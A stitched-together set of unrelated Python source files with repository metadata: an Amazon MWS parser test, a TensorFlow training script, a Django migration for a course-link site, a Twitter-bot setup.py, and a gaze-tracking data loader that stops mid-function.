<GetMatchingProductForIdResult Id="082676082658" IdType="UPC" status="Success">
<Products xmlns="http://mws.amazonservices.com/schema/Products/2011-10-01"
xmlns:ns2="http://mws.amazonservices.com/schema/Products/2011-10-01/default.xsd">
<Product>
<Empty />
</Product>
</Products>
</GetMatchingProductForIdResult>
"""
def setUp(self):
self.parser = GetMatchingProductForIdResult.load(self.body)
def test_id_(self):
self.assertEqual(self.parser.id_, '082676082658')
def test_id_type(self):
self.assertEqual(self.parser.id_type, 'UPC')
def test_status(self):
self.assertEqual(self.parser.status, 'Success')
def test_is_success(self):
self.assertTrue(self.parser.is_success())
def test_products(self):
self.assertEqual(len(self.parser.products()), 1)
__all__ = [
TestGetMatchingProductForIdResult
]
def suite():
s = TestSuite()
for a in __all__:
s.addTest(makeSuite(a))
return s
if __name__ == '__main__':
main(defaultTest='suite')
| 24.696429
| 99
| 0.67462
|
11c473179412bda0914c3544cded68fcfdc0cc7d
| 1,929
|
py
|
Python
|
train.py
|
pasquini-dario/InterpretablePPSM
|
eb2732bb2e6f7e53827a2b0a2f46c9a4d84c42d8
|
[
"Apache-2.0"
] | 2
|
2020-04-21T09:16:11.000Z
|
2021-02-19T06:47:42.000Z
|
train.py
|
pasquini-dario/InterpretablePPSM
|
eb2732bb2e6f7e53827a2b0a2f46c9a4d84c42d8
|
[
"Apache-2.0"
] | 2
|
2021-10-06T13:23:10.000Z
|
2021-10-09T04:38:31.000Z
|
train.py
|
pasquini-dario/InterpretablePPSM
|
eb2732bb2e6f7e53827a2b0a2f46c9a4d84c42d8
|
[
"Apache-2.0"
] | 2
|
2020-11-13T12:40:43.000Z
|
2021-10-07T12:12:46.000Z
|
MODEL_OUT = 'HOME/MODELs'
LOG_OUT = 'HOME/LOGs'
import tensorflow as tf
gpus = tf.config.experimental.list_physical_devices('GPU')
import os, sys, gin
import modelCNN as model
import input_pipeline
from trainer import Trainer
import architectureCNN as architecture
def basenameNoExt(path, sep='.'):
name = os.path.basename(path)
return name.split(sep)[0]
@gin.configurable
def setup(name, MODEL_TYPE, home_train, home_tests, max_epochs, log_freq, MAX_LEN, hparams):
check_train_dir = os.path.join(LOG_OUT, name)
check_test_dir = os.path.join(check_train_dir, 'eval')
MAX_MASK = hparams['masked_chars']
INCLUDE_END_SYMBOL = hparams['append_end']
train_batch, vocab_size, cm = input_pipeline.makeIterInput(home_train, hparams['batch_size'], MAX_MASK, INCLUDE_END_SYMBOL, MAX_LEN)
optimizer = tf.keras.optimizers.Adam(hparams['learning_rate'])
f, train_step, predict_step = model.make_train_predict(hparams, optimizer, vocab_size, MAX_LEN)
model_mem_footprint = (f.count_params() * 4) // (10 ** 6)
print("\t MODEL_MEM: %dMB" % model_mem_footprint)
t = Trainer(
f,
MAX_LEN,
cm,
train_step,
predict_step,
max_epochs,
train_batch,
home_tests,
optimizer,
check_train_dir,
check_test_dir,
1,
log_freq,
hparams,
)
print("TRAIN")
t()
print("EXPORT")
mpath = os.path.join(MODEL_OUT, name+'.h5')
f.save(mpath, overwrite=True, include_optimizer=False, save_format='h5')
if __name__ == '__main__':
try:
conf_path = sys.argv[1]
except:
print("USAGE: conf_file_gin")
sys.exit(1)
gin.parse_config_file(conf_path)
name = basenameNoExt(conf_path)
print("Name: ", name)
setup(name)
| 25.72
| 136
| 0.62675
|
52594270776daa8f95eea39fc4298db6eeb68c12
| 15,925
|
py
|
Python
|
semesterpage/migrations/0001_initial.py
|
JakobGM/WikiLinks
|
5743b1d4c3fefa66fcaa4d283436d2a3f0490604
|
[
"MIT"
] | 6
|
2017-08-12T09:55:06.000Z
|
2019-09-03T08:05:21.000Z
|
semesterpage/migrations/0001_initial.py
|
JakobGM/WikiLinks
|
5743b1d4c3fefa66fcaa4d283436d2a3f0490604
|
[
"MIT"
] | 57
|
2017-08-11T23:05:07.000Z
|
2022-03-11T23:32:12.000Z
|
semesterpage/migrations/0001_initial.py
|
JakobGM/WikiLinks
|
5743b1d4c3fefa66fcaa4d283436d2a3f0490604
|
[
"MIT"
] | 1
|
2017-09-27T15:31:15.000Z
|
2017-09-27T15:31:15.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-05 00:21
from __future__ import unicode_literals
import autoslug.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import sanitizer.models
import semesterpage.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contributor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('access_level', models.SmallIntegerField(choices=[(0, 'Ingen tilgang'), (1, 'Opprettede fag'), (2, 'Kun semesteret'), (3, 'Hele hovedprofilen'), (4, 'Hele studieprogrammet')], default=1, help_text='Gir muligheten til å endre på lenker o.l. knyttet til semesteret spesifisert nedenfor.', verbose_name='tilgangsnivå')),
],
options={
'verbose_name_plural': 'bidragsytere',
'verbose_name': 'bidragsyter',
},
),
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Prosedyre- og Objektorientert Programmering"', max_length=60, unique=True, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "C++"', max_length=60, verbose_name='visningsnavn')),
('logo', models.FileField(blank=True, help_text='Bildet vises over alle lenkene knyttet til faget. Bør være kvadratisk for å unngå uheldige skaleringseffekter.', null=True, upload_to=semesterpage.models.upload_path)),
('homepage', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/". Denne lenken kan besøkes ved å trykke på ikonet til faget.', verbose_name='Fagets hjemmeside')),
('course_code', models.CharField(help_text='F.eks. "TDT4102"', max_length=10, unique=True, verbose_name='emnekode')),
('contributors', models.ManyToManyField(blank=True, help_text='Bidragsytere som har redigeringstilgang til faget.', related_name='courses', to='semesterpage.Contributor')),
],
options={
'ordering': ['display_name'],
'verbose_name_plural': 'fag',
'verbose_name': 'fag',
},
),
migrations.CreateModel(
name='CourseLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/gamleeksamener.html"', verbose_name='URL')),
('category', models.CharField(blank=True, choices=[('tasks.svg', 'Øvinger og prosjekter'), ('solutions.svg', 'Løsningsforslag'), ('videos.svg', 'Videoforelesninger'), ('timetable.svg', 'Framdrifts- og timeplaner'), ('syllabus.svg', 'Pensum'), ('formulas.svg', 'Formelark'), ('exams.svg', 'Eksamener'), ('facebook.svg', 'Facebook'), ('info.svg', 'Informasjon'), ('important_info.svg', 'Viktig informasjon'), ('ntnu.svg', 'NTNU-lenker'), ('wikipendium.svg', 'Wikipendium'), ('book.svg', 'Pensumbok'), ('quiz.svg', 'Quiz og punktlister'), ('software.svg', 'Programvare')], default=None, help_text='F.eks. "Løsningsforslag". Valget bestemmer hvilket "mini-ikon" som plasseres ved siden av lenken.', max_length=60, null=True, verbose_name='Kateogri')),
('order', models.PositiveSmallIntegerField(default=0, help_text='Bestemmer hvilken rekkefølge lenkene skal vises i. Lavest kommer først.', verbose_name='rekkefølge')),
('title', sanitizer.models.SanitizedCharField(help_text='F.eks "Gamle eksamenssett"', max_length=100, verbose_name='tittel')),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='links', to='semesterpage.Course', verbose_name='fag')),
],
options={
'ordering': ('order',),
'abstract': False,
'verbose_name_plural': 'lenker',
'verbose_name': 'lenke',
},
),
migrations.CreateModel(
name='CustomLinkCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=60, unique=True, verbose_name='Egendefinert kategori')),
('thumbnail', models.FileField(blank=True, upload_to=semesterpage.models.upload_path, verbose_name='ikon for kategori')),
],
options={
'verbose_name_plural': 'lenkekategorier',
'verbose_name': 'lenkekategori',
},
),
migrations.CreateModel(
name='MainProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Industriell matematikk"', max_length=60, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "InMat"', max_length=60, verbose_name='visningsnavn / kallenavn')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='display_name', unique_with=('study_program',))),
],
options={
'ordering': ['display_name'],
'verbose_name_plural': 'hovedprofiler',
'verbose_name': 'hovedprofil',
},
),
migrations.CreateModel(
name='Options',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('homepage', models.CharField(blank=True, help_text='Du kan besøke din personlige semesterside på kokekunster.no/hjemmesidenavn eller hjemmesidenavn.kokekunster.no. Der dukker alle fagene i semesteret du velger nedenfor opp, eller så kan du også velge din egen fagkombinasjon.', max_length=60, null=True, unique=True, verbose_name='hjemmesidenavn')),
('homepage_slug', autoslug.fields.AutoSlugField(always_update=True, blank=True, editable=False, null=True, populate_from='homepage', unique=True)),
('calendar_name', models.CharField(blank=True, default=None, help_text='Tast inn ditt kalendernavn på ntnu.1024.no.', max_length=60, null=True, verbose_name='1024-kalendernavn')),
('self_chosen_courses', models.ManyToManyField(blank=True, default=None, help_text='Hvis du ikke går et ordinært semester, og heller har lyst å velge dine egne fag.', related_name='students', to='semesterpage.Course', verbose_name='fag')),
],
options={
'ordering': ('user__username',),
'abstract': False,
'verbose_name_plural': 'instillinger',
'verbose_name': 'instillinger',
},
),
migrations.CreateModel(
name='ResourceLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/gamleeksamener.html"', verbose_name='URL')),
('category', models.CharField(blank=True, choices=[('tasks.svg', 'Øvinger og prosjekter'), ('solutions.svg', 'Løsningsforslag'), ('videos.svg', 'Videoforelesninger'), ('timetable.svg', 'Framdrifts- og timeplaner'), ('syllabus.svg', 'Pensum'), ('formulas.svg', 'Formelark'), ('exams.svg', 'Eksamener'), ('facebook.svg', 'Facebook'), ('info.svg', 'Informasjon'), ('important_info.svg', 'Viktig informasjon'), ('ntnu.svg', 'NTNU-lenker'), ('wikipendium.svg', 'Wikipendium'), ('book.svg', 'Pensumbok'), ('quiz.svg', 'Quiz og punktlister'), ('software.svg', 'Programvare')], default=None, help_text='F.eks. "Løsningsforslag". Valget bestemmer hvilket "mini-ikon" som plasseres ved siden av lenken.', max_length=60, null=True, verbose_name='Kateogri')),
('order', models.PositiveSmallIntegerField(default=0, help_text='Bestemmer hvilken rekkefølge lenkene skal vises i. Lavest kommer først.', verbose_name='rekkefølge')),
('title', sanitizer.models.SanitizedCharField(help_text='F.eks "Wolfram Alpha"', max_length=100, verbose_name='tittel')),
('custom_category', models.ForeignKey(blank=True, default=None, help_text='Hvis du ønsker å bruke et egendefinert "mini-ikon".', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='links', to='semesterpage.CustomLinkCategory', verbose_name='(Egendefinert kategori)')),
],
options={
'ordering': ('order',),
'abstract': False,
'verbose_name_plural': 'ressurslenker',
'verbose_name': 'ressurslenke',
},
),
migrations.CreateModel(
name='ResourceLinkList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Prosedyre- og Objektorientert Programmering"', max_length=60, unique=True, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "C++"', max_length=60, verbose_name='visningsnavn')),
('logo', models.FileField(blank=True, help_text='Bildet vises over alle lenkene knyttet til faget. Bør være kvadratisk for å unngå uheldige skaleringseffekter.', null=True, upload_to=semesterpage.models.upload_path)),
('homepage', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/". Denne lenken kan besøkes ved å trykke på ikonet til faget.', verbose_name='Fagets hjemmeside')),
('default', models.BooleanField(default=False, help_text='Skal denne ressurslenkelisten brukes i alle studieprogram som ikke har satt sine egendefinerte ressurslenkelister?', verbose_name='standard ressurslenkeliste')),
('order', models.PositiveSmallIntegerField(default=0, help_text='Bestemmer hvilken rekkefølge ressurslenkelistene skal vises i. Lavest kommer først.', verbose_name='Rekkefølge')),
],
options={
'ordering': ['order'],
'verbose_name_plural': 'Ressurslenkelister',
'verbose_name': 'Ressurslenkeliste',
},
),
migrations.CreateModel(
name='Semester',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('number', models.PositiveSmallIntegerField(help_text='F.eks. "2"', verbose_name='semesternummer')),
('published', models.BooleanField(default=False, help_text='Semesteret dukker ikke opp i navigasjonsbaren før det er publisert, men det er fortsatt mulig å besøke semesteret manuelt (URL: kokekunster.no/studieprogram/hovedprofil/semesternummer) for å teste resultatet før du publiserer.', verbose_name='publisert')),
('main_profile', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='semesters', to='semesterpage.MainProfile', verbose_name='hovedprofil')),
],
options={
'ordering': ['main_profile__display_name', 'number'],
'verbose_name_plural': 'semestere',
'verbose_name': 'semester',
},
),
migrations.CreateModel(
name='StudyProgram',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Fysikk og matematikk"', max_length=60, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "Fysmat"', max_length=60, verbose_name='visningsnavn / kallenavn')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='display_name', unique=True)),
('has_archive', models.BooleanField(default=False, help_text='Huk av hvis studieprogrammet har filer i arkivet på kokekunster.no/arkiv.', verbose_name='har arkiv')),
('published', models.BooleanField(default=False, help_text='Studieprogrammet dukker ikke opp i studieprogramlisten i navigasjonsbaren før det er publisert, men det er fortsatt mulig å besøke studieprogrammet manuelt (URL: visningsnavn.kokekunster.no) for å teste resultatet før du publiserer.', verbose_name='publisert')),
],
options={
'ordering': ['display_name'],
'verbose_name_plural': 'studieprogram',
'verbose_name': 'studieprogram',
},
),
migrations.AddField(
model_name='semester',
name='study_program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='semesters', to='semesterpage.StudyProgram', verbose_name='studieprogram'),
),
migrations.AddField(
model_name='resourcelinklist',
name='study_programs',
field=models.ManyToManyField(blank=True, related_name='_resource_link_lists', to='semesterpage.StudyProgram', verbose_name='studieprogram'),
),
migrations.AddField(
model_name='resourcelink',
name='resource_link_list',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='links', to='semesterpage.ResourceLinkList', verbose_name='ressurslenkeliste'),
),
migrations.AddField(
model_name='options',
name='self_chosen_semester',
field=models.ForeignKey(blank=True, default=None, help_text='Semesteret du for øyeblikket går.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='students', to='semesterpage.Semester', verbose_name='semester'),
),
migrations.AddField(
model_name='options',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='options', to=settings.AUTH_USER_MODEL, verbose_name='bruker'),
),
migrations.AddField(
model_name='mainprofile',
name='study_program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='main_profiles', to='semesterpage.StudyProgram', verbose_name='studieprogram'),
),
migrations.AddField(
model_name='course',
name='semesters',
field=models.ManyToManyField(blank=True, help_text='Hvis du lager et fag for deg selv, så kan du bare hoppe over dette valget.', related_name='courses', to='semesterpage.Semester', verbose_name='semestre'),
),
migrations.AddField(
model_name='contributor',
name='semester',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='contributors', to='semesterpage.Semester', verbose_name='bidragsytersemester'),
),
migrations.AddField(
model_name='contributor',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='contributor', to=settings.AUTH_USER_MODEL, verbose_name='bruker'),
),
]
| 72.716895
| 763
| 0.643893
|
2a5626f84b3255e38bba4b98d88371caac376d1e
| 885
|
py
|
Python
|
setup.py
|
amercader/munibot
|
8ee6d0449e41aa3cb1231f7855d95730ab567f8f
|
[
"MIT"
] | 4
|
2020-12-27T16:43:27.000Z
|
2021-10-02T11:35:08.000Z
|
setup.py
|
amercader/munibot
|
8ee6d0449e41aa3cb1231f7855d95730ab567f8f
|
[
"MIT"
] | 3
|
2020-12-13T14:22:08.000Z
|
2021-04-04T21:55:11.000Z
|
setup.py
|
amercader/munibot
|
8ee6d0449e41aa3cb1231f7855d95730ab567f8f
|
[
"MIT"
] | 2
|
2021-01-11T22:15:38.000Z
|
2021-01-12T09:08:27.000Z
|
import setuptools
with open("README.md", "r") as f:
long_description = f.read()
with open("requirements.txt", "r") as f:
install_requires = f.readlines()
setuptools.setup(
name="munibot",
version="0.0.4",
author="Adrià Mercader",
author_email="amercadero@gmail.com",
description="A Twitter bot that tweets aerial imagery pictures of municipalities",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/amercader/munibot",
packages=setuptools.find_packages(),
install_requires=install_requires,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
entry_points={
"console_scripts": ["munibot=munibot.munibot:main"],
},
)
| 29.5
| 86
| 0.672316
|
1ae5d5f3d14f715282d13916d4d43c40937a59e1
| 35,469
|
py
|
Python
|
ITrackerData.py
|
MSREnable/GazeCapture
|
54f00ab428a7dbb51f8f0c37f22bba6b3cb54726
|
[
"RSA-MD"
] | 15
|
2019-08-28T22:06:51.000Z
|
2021-10-08T09:52:13.000Z
|
ITrackerData.py
|
MSREnable/GazeCapture
|
54f00ab428a7dbb51f8f0c37f22bba6b3cb54726
|
[
"RSA-MD"
] | null | null | null |
ITrackerData.py
|
MSREnable/GazeCapture
|
54f00ab428a7dbb51f8f0c37f22bba6b3cb54726
|
[
"RSA-MD"
] | 6
|
2020-11-18T02:46:55.000Z
|
2021-07-08T11:12:11.000Z
|
import torch
import os
import os.path
import scipy.io as sio
import numpy as np
import math
from random import random, shuffle
# CPU data loader
from PIL import Image
import torchvision.transforms as transforms
from utility_functions.Utilities import centered_text
from torch.utils.data.dataloader import default_collate
try:
# GPU data loader
from nvidia.dali.pipeline import Pipeline
import nvidia.dali.ops as ops
import nvidia.dali.types as types
from nvidia.dali.plugin.pytorch import DALIGenericIterator
except ImportError:
# If running on a non-CUDA system, stub out Pipeline to prevent code crash
class Pipeline:
def __init__(self, *args):
return
# If running on a non-CUDA system, stub out DALIGenericIterator to prevent code crash
class DALIGenericIterator:
def __init__(self, *args):
return
def normalize_image_transform(image_size, split, jitter, color_space):
normalize_image = []
# Only for training
if split == 'train':
normalize_image.append(transforms.Resize(240))
if jitter:
normalize_image.append(transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1))
normalize_image.append(transforms.RandomCrop(image_size))
# For training and Eval
normalize_image.append(transforms.Resize(image_size))
normalize_image.append(transforms.ToTensor())
if color_space == 'RGB':
normalize_image.append(transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])) # Well known ImageNet values
return transforms.Compose(normalize_image)
def resize_image_transform(image_size):
normalize_image = []
normalize_image.append(transforms.Resize(image_size))
normalize_image.append(transforms.ToTensor())
return transforms.Compose(normalize_image)
class ExternalSourcePipeline(Pipeline):
def __init__(self, data, batch_size, image_size, split, silent, num_threads, device_id, data_loader, color_space, shuffle=False):
super(ExternalSourcePipeline, self).__init__(batch_size,
num_threads,
device_id)
self.split = split
self.color_space = color_space
self.data_loader = data_loader
if shuffle:
data.shuffle()
self.sourceIterator = iter(data)
self.rowBatch = ops.ExternalSource()
self.imFaceBatch = ops.ExternalSource()
self.imEyeLBatch = ops.ExternalSource()
self.imEyeRBatch = ops.ExternalSource()
self.imFaceGridBatch = ops.ExternalSource()
self.gazeBatch = ops.ExternalSource()
self.indexBatch = ops.ExternalSource()
mean = None
std = None
if color_space == 'RGB':
output_type = types.RGB
mean=[0.485 * 255, 0.456 * 255, 0.406 * 255]
std=[0.229 * 255, 0.224 * 255, 0.225 * 255]
elif color_space == 'YCbCr':
output_type = types.YCbCr
elif color_space == 'L':
output_type = types.GRAY
elif color_space == 'BGR':
output_type = types.BGR
else:
print("Unsupported color_space:", color_space)
# Variation range for Saturation, Contrast, Brightness and Hue
self.dSaturation = ops.Uniform(range=[0.9, 1.1])
self.dContrast = ops.Uniform(range=[0.9, 1.1])
self.dBright = ops.Uniform(range=[0.9, 1.1])
self.dHue = ops.Uniform(range=[-0.1, 0.1])
if data_loader == "cpu":
print("Error: cpu data loader shouldn't be handled by DALI")
else:
# ---------- Decoding Operations --------- #
# ImageDecoder in mixed mode doesn't support YCbCr
# Ref: https://github.com/NVIDIA/DALI/pull/582/files
self.decode = ops.ImageDecoder(device="cpu", output_type=output_type)
# ---------- Augmentation Operations --------- #
# execute rest of the operations on the target device based upon the mode
device = "cpu" if data_loader == "dali_cpu" else "gpu"
self.resize_big = ops.Resize(device=device, resize_x=240, resize_y=240)
# depreciated replace with HSV and ops.BrightnessContrast soon
self.color_jitter = ops.ColorTwist(device=device, image_type=output_type)
# random area 0.93-1.0 corresponds to croping randomly from an image of size between (224-240)
self.crop = ops.RandomResizedCrop(device=device, random_area=[0.93, 0.93], size=image_size)
# ---------- Normalization Operations --------- #
self.resize = ops.Resize(device=device, resize_x=image_size[0], resize_y=image_size[1])
self.norm = ops.CropMirrorNormalize(device=device,
output_dtype=types.FLOAT,
output_layout='CHW',
image_type=output_type,
mean=mean,
std=std)
def define_graph(self):
self.row = self.rowBatch()
self.imFace = self.imFaceBatch()
self.imEyeL = self.imEyeLBatch()
self.imEyeR = self.imEyeRBatch()
self.imFaceGrid = self.imFaceGridBatch()
self.gaze = self.gazeBatch()
self.index = self.indexBatch()
sat, con, bri, hue = self.dSaturation(), self.dContrast(), self.dBright(), self.dHue()
def stream(image, augment=True):
# Decoding
image = self.decode(image)
if self.data_loader == "dali_gpu":
image = image.gpu()
# Augmentations (for training only)
if self.split == 'train' and augment:
image = self.resize_big(image)
image = self.color_jitter(image, saturation=sat, contrast=con, brightness=bri, hue=hue)
# Normalize
image = self.resize(image)
image = self.norm(image)
return image
# pass the input through dali stream
imFaceD = stream(self.imFace)
imEyeLD = stream(self.imEyeL)
imEyeRD = stream(self.imEyeR)
imFaceGridD = stream(self.imFaceGrid, False)
return (self.row, imFaceD, imEyeLD, imEyeRD, imFaceGridD, self.gaze, self.index)
@property
def size(self):
return len(self.sourceIterator)
def iter_setup(self):
(rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch,
indexBatch) = self.sourceIterator.next()
self.feed_input(self.row, rowBatch)
self.feed_input(self.imFace, imFaceBatch)
self.feed_input(self.imEyeL, imEyeLBatch)
self.feed_input(self.imEyeR, imEyeRBatch)
self.feed_input(self.imFaceGrid, imFaceGridBatch)
self.feed_input(self.gaze, gazeBatch)
self.feed_input(self.index, indexBatch)
# class ExternalSourcePipeline(Pipeline):
# def __init__(self, data, batch_size, image_size, split, silent, num_threads, device_id, data_loader, color_space, shuffle=False):
# super(ExternalSourcePipeline, self).__init__(batch_size,
# num_threads,
# device_id)
# self.split = split
# self.color_space = color_space
# self.data_loader = data_loader
# if shuffle:
# data.shuffle()
# self.sourceIterator = iter(data)
# self.rowBatch = ops.ExternalSource()
# self.imFaceBatch = ops.ExternalSource()
# self.imEyeLBatch = ops.ExternalSource()
# self.imEyeRBatch = ops.ExternalSource()
# self.imFaceGridBatch = ops.ExternalSource()
# self.gazeBatch = ops.ExternalSource()
# self.indexBatch = ops.ExternalSource()
# self.frameBatch = ops.ExternalSource()
# mean = None
# std = None
# if color_space == 'RGB':
# output_type = types.RGB
# mean=[0.485 * 255, 0.456 * 255, 0.406 * 255]
# std=[0.229 * 255, 0.224 * 255, 0.225 * 255]
# elif color_space == 'YCbCr':
# output_type = types.YCbCr
# elif color_space == 'L':
# output_type = types.GRAY
# elif color_space == 'BGR':
# output_type = types.BGR
# else:
# print("Unsupported color_space:", color_space)
# # Variation range for Saturation, Contrast, Brightness and Hue
# self.dSaturation = ops.Uniform(range=[0.9, 1.1])
# self.dContrast = ops.Uniform(range=[0.9, 1.1])
# self.dBright = ops.Uniform(range=[0.9, 1.1])
# self.dHue = ops.Uniform(range=[-0.1, 0.1])
# if data_loader == "cpu":
# print("Error: cpu data loader shouldn't be handled by DALI")
# else:
# # ---------- Decoding Operations --------- #
# # ImageDecoder in mixed mode doesn't support YCbCr
# # Ref: https://github.com/NVIDIA/DALI/pull/582/files
# self.decode = ops.ImageDecoder(device="cpu", output_type=output_type)
# # ---------- Augmentation Operations --------- #
# # execute rest of the operations on the target device based upon the mode
# device = "cpu" if data_loader == "dali_cpu" else "gpu"
# self.resize_big = ops.Resize(device=device, resize_x=240, resize_y=240)
# # depreciated replace with HSV and ops.BrightnessContrast soon
# self.color_jitter = ops.ColorTwist(device=device, image_type=output_type)
# # random area 0.93-1.0 corresponds to croping randomly from an image of size between (224-240)
# self.crop = ops.RandomResizedCrop(device=device, random_area=[0.93, 0.93], size=image_size)
# # ---------- Normalization Operations --------- #
# self.resize = ops.Resize(device=device, resize_x=image_size[0], resize_y=image_size[1])
# self.norm = ops.CropMirrorNormalize(device=device,
# output_dtype=types.FLOAT,
# output_layout='CHW',
# image_type=output_type,
# mean=mean,
# std=std)
# def define_graph(self):
# self.row = self.rowBatch()
# self.imFace = self.imFaceBatch()
# self.imEyeL = self.imEyeLBatch()
# self.imEyeR = self.imEyeRBatch()
# self.imFaceGrid = self.imFaceGridBatch()
# self.gaze = self.gazeBatch()
# self.index = self.indexBatch()
# self.frame = self.frameBatch()
# sat, con, bri, hue = self.dSaturation(), self.dContrast(), self.dBright(), self.dHue()
# def stream(image, augment=True):
# # Decoding
# image = self.decode(image)
# if self.data_loader == "dali_gpu":
# image = image.gpu()
# # Augmentations (for training only)
# if self.split == 'train' and augment:
# image = self.resize_big(image)
# image = self.color_jitter(image, saturation=sat, contrast=con, brightness=bri, hue=hue)
# # Normalize
# image = self.resize(image)
# image = self.norm(image)
# return image
# # pass the input through dali stream
# imFaceD = stream(self.imFace)
# imEyeLD = stream(self.imEyeL)
# imEyeRD = stream(self.imEyeR)
# imFaceGridD = stream(self.imFaceGrid, False)
# return (self.row, imFaceD, imEyeLD, imEyeRD, imFaceGridD, self.gaze, self.index, self.frame)
# @property
# def size(self):
# return len(self.sourceIterator)
# def iter_setup(self):
# (rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch,
# indexBatch, frameBatch) = self.sourceIterator.next()
# self.feed_input(self.row, rowBatch)
# self.feed_input(self.imFace, imFaceBatch)
# self.feed_input(self.imEyeL, imEyeLBatch)
# self.feed_input(self.imEyeR, imEyeRBatch)
# self.feed_input(self.imFaceGrid, imFaceGridBatch)
# self.feed_input(self.gaze, gazeBatch)
# self.feed_input(self.index, indexBatch)
# self.feed_input(self.frame, frameBatch)
class ITrackerMetadata(object):
def __init__(self, dataPath, silent=True):
if not silent:
print('Loading iTracker dataset')
metadata_file = os.path.join(dataPath, 'metadata.mat')
self.metadata = self.loadMetadata(metadata_file, silent)
def loadMetadata(self, filename, silent):
if filename is None or not os.path.isfile(filename):
raise RuntimeError('There is no such file %s! Provide a valid dataset path.' % filename)
try:
# http://stackoverflow.com/questions/6273634/access-array-contents-from-a-mat-file-loaded-using-scipy-io-loadmat-python
if not silent:
print('\tReading metadata from %s' % filename)
metadata = sio.loadmat(filename, squeeze_me=True, struct_as_record=False)
except:
raise RuntimeError('Could not read metadata file %s! Provide a valid dataset path.' % filename)
return metadata
class Dataset:
def __init__(self, split, data, size, loader):
self.split = split
self.data = data
self.size = size
self.loader = loader
# class ITrackerData(object):
# def __init__(self,
# dataPath,
# metadata,
# batch_size,
# imSize,
# gridSize,
# split,
# silent=True,
# jitter=True,
# color_space='YCbCr',
# data_loader='cpu',
# shard_id=0,
# num_shards=1,
# data_format='V2'):
# self.dataPath = dataPath
# self.metadata = metadata
# self.batch_size = batch_size
# self.imSize = imSize
# self.gridSize = gridSize
# self.color_space = color_space
# self.data_loader = data_loader
# self.index = 0
# self.split = split
# self.data_format = data_format
# # ======= Sharding configuration variables ========
# if num_shards > 0:
# self.num_shards = num_shards
# else:
# raise ValueError("num_shards cannot be negative")
# if shard_id >= 0 and shard_id < self.num_shards:
# self.shard_id = shard_id
# else:
# raise ValueError(f"shard_id should be between 0 and %d i.e. 0 <= shard_id < num_shards."%(num_shards))
# # ====================================================
# if self.split == 'test':
# mask = self.metadata['labelTest']
# elif self.split == 'val':
# mask = self.metadata['labelVal']
# elif self.split == 'train':
# mask = self.metadata['labelTrain']
# elif self.split == 'all':
# mask = np.ones[len(self.metadata)]
# else:
# raise Exception('split should be test, val or train. The value of split was: {}'.format(self.split))
# self.indices = np.argwhere(mask)[:, 0]
# if not silent:
# print('Loaded iTracker dataset split "%s" with %d records.' % (self.split, len(self.indices)))
# if self.data_loader == 'cpu':
# self.normalize_image = normalize_image_transform(image_size=self.imSize, jitter=jitter, split=self.split, color_space=self.color_space)
# self.resize_transform = resize_image_transform(image_size=self.imSize)
# self.mirror_transform = transforms.RandomHorizontalFlip(p=1.0)
# self.mirrorCoordinates = np.array([-1.0, 1.0])
# def __len__(self):
# return math.floor(len(self.indices)/self.num_shards)
# def loadImage(self, path):
# try:
# im = Image.open(path).convert(self.color_space)
# except OSError:
# raise RuntimeError('Could not read image: ' + path)
# return im
# def __getitem__(self, shard_index):
# # mapping for shards: shard index to absolute index
# index = self.shard_id * self.__len__() + shard_index
# rowIndex = self.indices[index]
